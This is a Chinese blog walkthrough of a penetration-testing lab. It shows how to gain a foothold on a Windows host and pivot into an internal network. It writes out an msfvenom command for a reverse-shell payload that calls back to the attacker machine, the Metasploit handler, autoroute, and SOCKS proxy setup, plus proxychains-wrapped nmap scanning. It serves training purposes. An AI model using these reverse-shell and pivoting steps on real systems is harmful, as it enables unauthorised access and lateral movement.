msf+proxychains组合搭建socks5隧道 | 内网穿透

于 2024-08-19 16:45:25 发布
阅读量454 收藏 9
点赞数 10
分类专栏: IntraNet 文章标签: 计算机网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ULGANOY/article/details/141329271
版权

实验环境

网络拓扑:
在这里插入图片描述

kali:

  • VMnet1(公网)192.168.52.134

win10:

  • VMnet1(公网)192.168.52.135
  • VMnet2(内网)192.168.72.133

win2008:

  • VMnet2(内网) 192.168.72.132

学习参考:https://www.cnblogs.com/cute-puli/p/15510271.html

1. 拿下域内主机win10权限

这里直接msfvenom生成一个反弹shell木马。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.134 LPORT=2333 --platform windows -f exe -o shell.exe

复制到win10,

kali进入msfconsole

user exploit/multi/hanlder
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.52.134
set LPORT 2333
exploit -j

然后win10运行shell.exe就可以上线。

在这里插入图片描述

2. 添加路由

拿到meterpreter后,查看当前路由:

route

看到win10的路由(192.168.72.0):

在这里插入图片描述

我们把对应内网段的路由添加:

run autoroute -s 192.168.72.0

然后查看添加的路由:

run autoroute -p

在这里插入图片描述

3. 配置socks5内网代理

添加好内网路由后,background退出meterpreter;

搜索可以做代理的模块:

socks5

search socks_proxy

在这里插入图片描述

使用这个模块:(这个socks5代理要设置对应账号密码)

use auxiliary/server/socks_proxy
show options
set username admin
set password admin
run

在这里插入图片描述

4. proxychains | proxifier 测试连接

proxifier

对应填好:

ip: 192.168.52.134
port: 1080
username: admin
password: admin

在这里插入图片描述

可以看到是能连接的,访问不了外网是因为我网段都配的非NAT(方便配置)。

这里可以把测试baidu的换成192.168.72.132:445来测试:

在这里插入图片描述

这里尝试配置下proxifer使得能够rdp连接win2008这台域内主机。192.168.72.132

在这里插入图片描述

成功。

proxychains

注意!!!

proxychains只对tcp流量有效,所以不能用udp和icmp。

kali自带有proxychains

我们在第三步设置好socks5的代理后,需要配置一下

/etc/proxychains4.conf

按照:

socks5 ip port username password

配置。

在这里插入图片描述

然后在所有执行的命令前加上

proxychains即可。

这里以nmap为示例:

注意:不能用ping扫描!!!

一定要用nmap -sT -Pn

proxychains nmap -sT -Pn 192.168.72.132

在这里插入图片描述

N0zoM1z0
关注
专栏目录
内网渗透-内网代理穿透和内网横向移动
lza20001103的博客
09-23 2336
内网代理穿透和内网横向移动 文章目录内网代理穿透和内网横向移动前言内网代理穿透nctermite(ew)ssh正向代理(A,B,C)msf设置路由和sock4代理访问内网流量内网横向移动后记 前言 进入内网后,我们就要扫描内网中有哪些主机了,重点是我们外网是无法访问内网的主机的,所在网段是不一样的,这时就需要我们设置代理和路由进行访问内网的流量了。上一期讲解了信息收集的相关内容,收集网段,补丁和域中成员以及域控的信息,对以下的横向移动至关重要,对后期的提权做好了准备。 内网代理穿透 首先,我们介绍几种代理工
内网渗透测试笔记
白帽黑客八哥的博客
05-28 954
DNS**请求就会落到我们提前搭建好的恶意DNS服务器上。
MSF横向之MSF端口转发+路由表+SOCKS5+proxychains
qq_46258964的博客
07-01 2541
MSF后渗透的一些操作 端口转发 添加路由,横向渗透(跨网段攻击) 利用arp扫描内网主机 Socks代理篇 新版的msf和老版的不一样,代理模块也不一样。 auxiliary/server/socks_proxy 配置proxychains 用代理软件去连接建立好的socks隧道,便可以成功访问内网。 proxychains+nmap扫描主机是否存在漏洞 proxychains使用msf框架...
快速使用proxychains设置代理上网
weixin_34138377的博客
12-18 3130
快速使用proxychains设置代理上网背景介绍:由于公司内部上网权限管理比较严格,因此放置在公司内部的测试服务器只有少数可以上网。而proxychains就可以非常简单快速的设置好代理,让其它不能上网的服务器通过能上网的服务器进行上网。proxychains只需要在不能上网的机器上安装好,而能够上网的服务器,是不需要任何配置的,只要能SSH登陆就可以。服务器环境:可以上网...
利用proxychains在终端使用socks5代理
foundamental的博客
01-02 2446
1.proxychains安装 1 2 3 4 5 6 git clone https://github.com/rofl0r/proxychains-ng.git cd proxychains-ng ./configure make && make install cp ./src/proxychains.conf /etc/proxycha...
内网渗透-如何利用msf把流量代理进内网-隧道搭建
weixin_42109829的博客
01-10 7126
0x01 前言 在攻防演练时,当我们拿下主机时,我们要开始对内网进行渗透,常见的手法有,frp,ew,等代理工具,这里我介绍一个工具 msf 模块中的socket 4a代理工具,这里我使用的是msf 5的版本,好像在使用msf 6的版本一直不成功的样子,所以你们做遇到代理不成功的情况下,可以尝试换个msf 5的版本进行尝试。 0x02 生成路由 msf操作 拓扑图如下 首先先生成一个elf 马进行上线 linux 生成木马上线文章—>linux主机生成木马攻击 run autoroute -s ip
代理内网穿透-Lcx.exe-venom-proxychains
代码审计
04-24 7563
代理面试常问一.概述代理的本质是socks协议
metasploit-内网穿透
qq_49694748的博客
01-11 3440
socks4a代理 端口转发 ·socks4a代理 实验拓扑 kali拿下web的shell并以此为跳板对内网进行渗透 模块:auxiliary/server/socks_proxy 设置srvhost和srvport为kali的IP地址和端口,注意默认版本是5,也可以设置成4a这点要区分,因为修改proxychains配置文件时会区别5和4a netstat查看是否监听 进行路由转发:post/multi/manage/autoroute 设置好session.
53-2 内网代理4 - frp搭建socks一级代理
最新发布
weixin_43263566的博客
07-09 197
FRP是一款专注于内网穿透的高性能反向代理应用,支持多种协议如TCP、UDP、HTTP、HTTPS等,能够安全、便捷地将内网服务通过具有公网IP的中转节点暴露到公网。在网络渗透和远程访问管理中,FRP是一个常用的代理工具之一。此外,FRP还支持搭建SOCKS5代理应用。功能特点多协议支持:支持TCP、UDP、HTTP、HTTPS等多种网络协议。安全性:提供安全的数据传输和访问控制。跨平台:提供了适用于Windows和Linux系统的两个版本。简易部署:通过简单的配置即可实现内网服务的公网访问。
渗透测试实战 - 外网渗透内网穿透(超详细)
HAKUNAMATATATTA的博客
02-18 8199
渗透测试实验,外网渗透和内网穿透的详细操作过程以及内网代理和内网探测的方法
socks+proxychains网络代理_ss5-3
2401_84254364的博客
04-12 488
测试)**[外链图片转存中…(img-SVaa3ezh-1712914278060)]
socks+proxychains网络代理_ss5-3,2024年最新面经解析
2401_84254364的博客
04-13 678
tar zxf ss5-3.8.9-8.tar.gz cd ss5-3.8.9/ ./configure && make -j4 && make install配置vim /etc/opt/ss5/ss5.conf #在原有基础上进行修改即可 第二个用户认证配置文件vim /etc/opt/ss5/ss5.passwd 以上两项为:用户名 密码启动socks5chmod +x /etc/init.d/ss5 #给socks5的启动脚本的执行权限 chkconfig --add ss5
msf添加路由及socks5代理
内心不种满鲜花就会长满杂草
05-07 8992
msf 添加路由 socks代理 nmap在挂上socks代理时进行扫描 -sT -Pn
内网安全--隧道技术-MSF上线本地
金灰的博客
05-28 962
免责声明:本文仅做技术交流与学习...
内网渗透中proxtychainsmsf的配合使用
weixin_45630387的博客
06-18 342
proxtychain内网渗透使用简单尝试
内网渗透-msf及socks代理转发
baynk的博客
05-29 9478
0x00 学习环境 拓扑如上,现在已经拥有了WIN2008的meterpreter权限 希望通过此主机进行代理转发,从而使msf能够攻击WIN7从而拿到权限。 0x01 路由转发1 先在meterpreter中使用route进行查看WIN2008所在的网段信息 通过background回到msf,使用route增加对应路由route add 172.16.10.0 255.255.255.0 1,1是挂起的session编号。 可以看到已经有路由了,用ms17-010打win7也可以成功拿到she
msf和frp内网穿透
08-19
msf和frp都是常用于内网穿透的工具,可以帮助远程访问和控制内网中的设备。 Metasploit Framework(简称msf)是一个开源的渗透测试框架,它提供了丰富的渗透测试工具和模块。虽然msf主要是用于渗透测试和漏洞利用,但它也可以通过反向连接来实现内网穿透。你可以在目标机器上执行一个反向Shell并将其连接到外部控制台,从而实现对内网设备的访问。 Frp是一个高性能的反向代理工具,可以帮助将内网服务暴露到公网中,实现内网穿透。通过在内网中启动Frp客户端,并在公网服务器上启动Frp服务器端,你可以将内网中的服务映射到公网IP上,从而实现对内网设备的远程访问。 总之,无论你选择使用msf还是frp,都可以帮助你实现内网穿透,让你可以方便地远程访问和控制内网中的设备。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值